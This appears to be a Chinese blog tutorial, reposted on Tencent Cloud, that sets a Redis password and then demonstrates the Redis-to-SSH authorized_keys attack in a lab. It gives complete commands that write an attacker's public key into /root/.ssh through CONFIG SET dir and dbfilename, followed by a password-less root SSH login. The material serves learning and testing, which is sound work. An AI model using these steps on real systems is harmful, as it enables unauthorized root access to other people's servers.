redis学习终章
当然这不是redis的终章,只是咱们这redis学习小系列的终章,大家可以将三篇文章连起来阅读理解会更好。
这里我们需要模拟有密码的环境,所以我们设置一下密码
我们需要设置密码的话,需要到之前的配置文件中去
目录
/etc/redis/redis-conf在配置文件最后一行
添加
requirepass 【密码】
vim中输入G到最后一行
gg到文章开头
然后重启redis服务器
可以直接使用
redis-cli shutdown命令关闭再启动
或者先登录上然后执行shutdown命令再启动
启动之后登录就需要输入密码
redis-cli -h 目标IP -a 密码
最后我们模拟免密登录漏洞的操作
前言:
这个漏洞的过程就是,获取到对方redis的登陆密码,我们可以登录了,然后在我们攻击机器上生成一个ssh的密钥,然后将我们的密钥传到对方的.ssh这个隐藏目录下,然后通过这个密钥进行无密码登录
首先我们打开kali进行一个ssh的密钥拷贝
ssh-keygen -t rsa
这里我们生成一个密钥保存到root目录下一个隐藏的.ssh文件夹中
我们上面路径默认,然后选择y,然后密码都为空直接回车就可以了
然后我们通过
ls -la命令查看root下的.ssh文件夹
然后我们查看下面的id_rsa文件
密钥保存在下面这里
然后我们需要通过修改这个格式并将其保存到一个txt中
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt
然后我们就可以利用我们已经登录或者已经知道密码的redis进行设置
首先就是将key.txt赋值给xxx
cat key.txt | redis-cli -h 192.168.119.150 -a 115277 -x set xxx
然后我们登录进去
这里我们get xxx就可以看到我们的key值了,证明我们插入成功了
设置一个路径
config set dir /root/.ssh
这里前提是对方主机中root下有.ssh文件夹
然后设置一个dir路径,设置db的filename
CONFIG SET dbfilename authorized_keys然后保存
save
到这里我们的配置就完成了,我们可以直接利用密钥进行无密码链接了
ssh -i id_rsa root@192.168.119.150当然这个是在攻击机器中的.ssh文件夹中,利用id_rsa进行连接
然后我们直接yes就可以连接成功了
本文参与?腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2023-06-05,如有侵权请联系?cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
相关产品与服务
云数据库 Redis
腾讯云数据库 Redis(TencentDB for Redis)是腾讯云打造的兼容 Redis 协议的缓存和存储服务。丰富的数据结构能帮助您完成不同类型的业务场景开发。支持主从热备,提供自动容灾切换、数据备份、故障迁移、实例监控、在线扩容、数据回档等全套的数据库服务。